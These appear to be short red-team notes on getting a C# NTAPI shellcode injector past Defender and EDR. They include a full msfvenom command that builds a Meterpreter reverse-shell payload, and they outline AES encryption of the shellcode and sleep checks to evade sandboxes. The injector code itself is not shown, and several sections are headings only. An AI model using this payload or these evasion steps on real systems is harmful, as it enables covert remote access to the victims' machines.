Evasion and bypassing detection within C#

Overview

AV and EDR bypass techniques for C# assembly payloads.

Experiment

In this experiment we will be using the NTAPI injector as our baseline.

Using NTAPI Undocumented Functions

Msfvenom payload

msfvenom -a x64 --platform Windows -p windows/x64/meterpreter/reverse_tcp LHOST=eth0 LPORT=443 -f raw EXITFUNC=thread -o shellcode.bin

Injector without any shellcode

For our baseline we tested the raw injector code without any shellcode in the payload.

Raw Meterpreter payload shellcode

Running injector with raw Meterpreter shellcode.

Using AES encryption

Encrypting the shellcode using AES

Aes encryptor

Runner it twice and defender is not so nice

So interesting, when executing it a second time Defenders behavioral analysis flagged and blocked execution.

Adding a sleep accelerator check to bypass sandboxing seems to do the trick to bypass this a second time.

Time accelerated checks

References

C# .Net Assembly